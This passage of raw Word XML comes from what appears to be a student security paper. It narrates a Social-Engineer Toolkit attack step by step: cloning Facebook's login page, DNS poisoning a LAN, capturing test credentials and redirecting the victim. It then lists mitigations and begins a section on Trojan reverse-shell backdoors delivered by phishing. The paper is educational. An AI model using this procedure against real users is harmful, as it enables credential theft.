      <w:r w:rsidR="00480430">
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">shown in </w:t>
      </w:r>
      <w:r w:rsidRPr="003A040D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>figure ??.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B05324" w14:textId="0142E120" w:rsidR="003A040D" w:rsidRDefault="003A040D" w:rsidP="00380F50">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E684A30" w14:textId="77777777" w:rsidR="00ED555E" w:rsidRDefault="009C62AF" w:rsidP="00ED555E">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="260E8020" wp14:editId="6DB37ABD">
            <wp:extent cx="3200400" cy="2274842"/>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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="42506"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3200400" cy="2274842"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC32C10" w14:textId="3639712F" w:rsidR="009C62AF" w:rsidRDefault="00ED555E" w:rsidP="00ED555E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:i w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Option 2 Selected: Website Attack Vectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6689F8D5" w14:textId="4777035B" w:rsidR="003A040D" w:rsidRDefault="003A040D" w:rsidP="003A040D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">A third menu appeared where the third option was selected that was; Credential Harvesting Attack Method shown in </w:t>
      </w:r>
      <w:r w:rsidRPr="00505025">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="009F4F1C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="00505025" w:rsidRPr="00505025">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F2E4F7" w14:textId="5DE6C45B" w:rsidR="003A040D" w:rsidRDefault="003A040D" w:rsidP="003A040D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C11C386" w14:textId="77777777" w:rsidR="009F4F1C" w:rsidRDefault="009C62AF" w:rsidP="009F4F1C">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12E81C95" wp14:editId="5BAD8A9E">
            <wp:extent cx="3200400" cy="14097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00400" cy="1409700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1601CB73" w14:textId="3FA578F8" w:rsidR="009C62AF" w:rsidRDefault="009F4F1C" w:rsidP="009F4F1C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Third Option Selected Credential Harvesting Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6F3DD5" w14:textId="082DEB3F" w:rsidR="00E224AF" w:rsidRPr="00302ADF" w:rsidRDefault="003A040D" w:rsidP="00E224AF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A fourth menu screen then appeared where option 2; Site Cloner was </w:t>
      </w:r>
      <w:r w:rsidR="009F4F1C">
        <w:t>selected. An</w:t>
      </w:r>
      <w:r w:rsidR="00E224AF">
        <w:t xml:space="preserve"> IP address prompt for the web</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E224AF">
        <w:t xml:space="preserve">server then appeared with the attackers local IP already set as the default, an alternate IP address could have been altered but the default IP address is the correct method for a LAN attack. So the ‘Enter’ key was used to accept the default IP web server address shown in </w:t>
      </w:r>
      <w:r w:rsidR="00E224AF" w:rsidRPr="00E224AF">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="00CA32D1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidR="00E224AF">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315E2F77" w14:textId="054FAF31" w:rsidR="00E224AF" w:rsidRDefault="00E224AF" w:rsidP="00E224AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AC4E283" w14:textId="77777777" w:rsidR="00CA32D1" w:rsidRDefault="00302ADF" w:rsidP="00CA32D1">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78976AE8" wp14:editId="63ED3E64">
            <wp:extent cx="3197860" cy="1634490"/>
            <wp:effectExtent l="0" t="0" r="2540" b="381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97860" cy="1634490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FCA3E9" w14:textId="1454FA5E" w:rsidR="00302ADF" w:rsidRDefault="00CA32D1" w:rsidP="00CA32D1">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:i w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Fourth Menu Selected Website Cloner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E4A8DD" w14:textId="2E30E3F0" w:rsidR="00E224AF" w:rsidRDefault="009D01E1" w:rsidP="00E224AF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The attacker was then prompted to enter the</w:t>
      </w:r>
      <w:r w:rsidR="00A9392C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A9392C" w:rsidRPr="00A9392C">
        <w:t>Uniform Resource Locator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A9392C">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00A9392C">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> website address of the website to be cloned, the URL; </w:t>
      </w:r>
      <w:r w:rsidRPr="009D01E1">
        <w:t>www.facebook.com</w:t>
      </w:r>
      <w:r>
        <w:t>. After the URL was entered the SET tool automatically cloned the website, poisoned the DNS gateway and hosted the fake website on the pre</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>installed ‘Apache2’ web</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidR="003738D1">
        <w:t>, that is listening for targets to connect</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>, in order to</w:t>
      </w:r>
      <w:r w:rsidR="003738D1">
        <w:t xml:space="preserve"> harvest thei</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="003738D1">
        <w:t xml:space="preserve"> credentials, illustrated in figure</w:t>
      </w:r>
      <w:r w:rsidR="00CA32D1">
        <w:t xml:space="preserve"> 13</w:t>
      </w:r>
      <w:r w:rsidR="003738D1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60721213" w14:textId="4744CE4B" w:rsidR="003738D1" w:rsidRDefault="003738D1" w:rsidP="00E224AF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24902646" w14:textId="77777777" w:rsidR="003738D1" w:rsidRPr="00E224AF" w:rsidRDefault="003738D1" w:rsidP="00E224AF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35D27911" w14:textId="77777777" w:rsidR="00CA32D1" w:rsidRDefault="00302ADF" w:rsidP="00CA32D1">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CAD6905" wp14:editId="52C888B9">
            <wp:extent cx="3200400" cy="99377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00400" cy="993775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED30DE5" w14:textId="41ECC902" w:rsidR="00302ADF" w:rsidRDefault="00CA32D1" w:rsidP="00CA32D1">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Cloned URL Entry; www.facebook.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7C890B" w14:textId="122062F6" w:rsidR="00010CBB" w:rsidRDefault="003738D1" w:rsidP="00380F50">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>From a client machine within the same LAN as the attacker</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">s machine, the website; </w:t>
      </w:r>
      <w:r w:rsidRPr="003738D1">
        <w:t>www.facebook.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was then entered into a client </w:t>
      </w:r>
      <w:r w:rsidR="00A83B64">
        <w:t>web browser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The fake webpage that was previously created appeared and the credentials; Username: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">John-Hack@hack.com and the Password: Hack was entered to test the attack illustrated in </w:t>
      </w:r>
      <w:r w:rsidRPr="003738D1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="00CA32D1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>14.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDE5B23" w14:textId="77777777" w:rsidR="003738D1" w:rsidRDefault="003738D1" w:rsidP="00380F50">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="063F8271" w14:textId="77777777" w:rsidR="00CA32D1" w:rsidRDefault="00302ADF" w:rsidP="00CA32D1">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="368DD62D" wp14:editId="078BF100">
            <wp:extent cx="3192145" cy="1608455"/>
            <wp:effectExtent l="0" t="0" r="825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92145" cy="1608455"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33615ACB" w14:textId="3263DA3A" w:rsidR="003738D1" w:rsidRDefault="00CA32D1" w:rsidP="00CA32D1">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Facebook Page Visited from Victims Web Browser Credentials Entered Into Cloned Fake Site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1866FB96" w14:textId="77777777" w:rsidR="00302ADF" w:rsidRDefault="00302ADF" w:rsidP="0000147C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F0174F2" w14:textId="098D4ACD" w:rsidR="003738D1" w:rsidRDefault="003738D1" w:rsidP="0000147C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00A83B64">
        <w:t xml:space="preserve">SET tool was then checked from the </w:t>
      </w:r>
      <w:r w:rsidR="00A9392C">
        <w:t>attacker’s</w:t>
      </w:r>
      <w:r w:rsidR="00A83B64">
        <w:t xml:space="preserve"> machine to identify if the credentials had been harvested, which they were. The results can be found in figure </w:t>
      </w:r>
      <w:r w:rsidR="00CA32D1">
        <w:t>15.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43091978" w14:textId="4F22EB1B" w:rsidR="00302ADF" w:rsidRDefault="00302ADF" w:rsidP="0000147C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="484A3439" w14:textId="77777777" w:rsidR="00CA32D1" w:rsidRDefault="00302ADF" w:rsidP="00CA32D1">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56E2DBEC" wp14:editId="1FA4613C">
            <wp:extent cx="3192145" cy="1524000"/>
            <wp:effectExtent l="0" t="0" r="825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92145" cy="1524000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3272A802" w14:textId="44E6CE0D" w:rsidR="003738D1" w:rsidRDefault="00CA32D1" w:rsidP="00CA32D1">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Attackers Machine, SET; Victims Credentials Harvested</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C5ED4E" w14:textId="0C03EC9D" w:rsidR="00A9392C" w:rsidRDefault="00A9392C" w:rsidP="0000147C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">So that the attacker did not become suspicious that their password had been harvested, the SET tool automatically redirected the victim to the correct </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="006D35CB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.facebook.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> login page, where they had to input their credentials again. This wouldn’t seem suspicious to users without cybersecurity knowledge. The redirection to the official website from the client machine can be found in figure </w:t>
      </w:r>
      <w:r w:rsidR="00D84490">
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F4BFA3" w14:textId="6D68C9AC" w:rsidR="00A9392C" w:rsidRDefault="00A9392C" w:rsidP="0000147C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09ED4877" w14:textId="77777777" w:rsidR="00CA32D1" w:rsidRDefault="00302ADF" w:rsidP="00CA32D1">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A555F7F" wp14:editId="01EFCE4D">
            <wp:extent cx="3196590" cy="1564005"/>
            <wp:effectExtent l="0" t="0" r="381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196590" cy="1564005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8331AD" w14:textId="4321F2E7" w:rsidR="00A9392C" w:rsidRDefault="00CA32D1" w:rsidP="00CA32D1">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Victims Browser Redirected to Official Facebook Website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248AB22C" w14:textId="77777777" w:rsidR="00302ADF" w:rsidRDefault="00302ADF" w:rsidP="0000147C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E17CC65" w14:textId="4274B766" w:rsidR="00A9392C" w:rsidRDefault="00A9392C" w:rsidP="0000147C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To mitigate against this attack, it is important to observe the certificate of authenticity next to the URL that is a symbol of a lock that has </w:t>
      </w:r>
      <w:r w:rsidR="00D84490">
        <w:t>Hypertext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Transport Protocol Secure (HTTPS) </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">next to it to confirm that the website being visited is </w:t>
      </w:r>
      <w:r w:rsidR="004D53BB">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CE3884">
        <w:t>legitimate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> website</w:t>
      </w:r>
      <w:r w:rsidR="004D53BB">
        <w:t xml:space="preserve"> shown in figure ??, this mitigation method cannot always be relied on because professional hackers can also spoof HTTPS certificates</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. A specialised wireless Virtual Private Network (VPN) tool </w:t>
      </w:r>
      <w:r w:rsidR="004D53BB">
        <w:t>is the most effective method to mitigate this issue that can be purchased</w:t>
      </w:r>
      <w:r w:rsidR="00CE3884">
        <w:t xml:space="preserve"> such as CyberGhost VPN, </w:t>
      </w:r>
      <w:r>
        <w:t>that detects DNS spoofing and also prevent</w:t>
      </w:r>
      <w:r w:rsidR="004D53BB">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MitM attacks by encrypting the traffic</w:t>
      </w:r>
      <w:r w:rsidR="004D53BB">
        <w:t xml:space="preserve"> using AES-256</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at the ‘Access’ layer and the ‘Network’ layer</w:t>
      </w:r>
      <w:r w:rsidR="004D53BB">
        <w:t xml:space="preserve"> so that the information being sent cannot be read by the attacker</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0254722E" w14:textId="77777777" w:rsidR="0000147C" w:rsidRPr="00380F50" w:rsidRDefault="0000147C" w:rsidP="00380F50">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E3DD0A1" w14:textId="43C41E99" w:rsidR="00E862F2" w:rsidRDefault="00277991" w:rsidP="00E862F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Creating a </w:t>
      </w:r>
      <w:r w:rsidR="00380F50">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Trojan Horse </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B1B622" w14:textId="77777777" w:rsidR="00BC6F1A" w:rsidRDefault="00277991" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00213A74" w:rsidRPr="00213A74">
        <w:t xml:space="preserve">imilar to </w:t>
      </w:r>
      <w:r>
        <w:t>the S</w:t>
      </w:r>
      <w:r w:rsidR="00213A74" w:rsidRPr="00213A74">
        <w:t xml:space="preserve">tuxnet </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and ‘Sony’ hack that was discussed within the </w:t>
      </w:r>
      <w:r w:rsidRPr="00277991">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cyberwarfar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e section of this paper </w:t>
      </w:r>
      <w:r w:rsidR="00213A74" w:rsidRPr="00213A74">
        <w:t xml:space="preserve">that utilises social engineering </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">as a manipulation tool </w:t>
      </w:r>
      <w:r w:rsidR="00213A74" w:rsidRPr="00213A74">
        <w:t>to gain control of a computer device</w:t>
      </w:r>
      <w:r>
        <w:t>. A piece of malware known as a ‘Trojan Horse’ is created by hackers that installs a reverse TCP payload within th</w:t>
      </w:r>
      <w:r w:rsidR="008B216D">
        <w:t>eir device like the payload utilised within the ‘Eternal Blue’ remote exploitation attack within this paper so that the attacker can bypass the firewall within the victim’s LAN and gain remote access to the device. A trojan horse is utilised when a device is secured within a network by a firewall and the OS is up to date with patches from exploits such as ‘Eternal Blue’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AD6D85" w14:textId="77777777" w:rsidR="00BC6F1A" w:rsidRDefault="00BC6F1A" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AF2CE4F" w14:textId="0622D4E8" w:rsidR="00BC6F1A" w:rsidRDefault="008B216D" w:rsidP="00213A74">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Trojan Horse malware once created needs to be delivered to the victim directly so that they install it themselves from their client devices. This is most commonly achieved by using a form of social engineering called a phishing E-Mail. A phishing E-Mail is a fake E-Mail sent to the victim that contains </w:t>
      </w:r>
      <w:r w:rsidR="00BC6F1A">
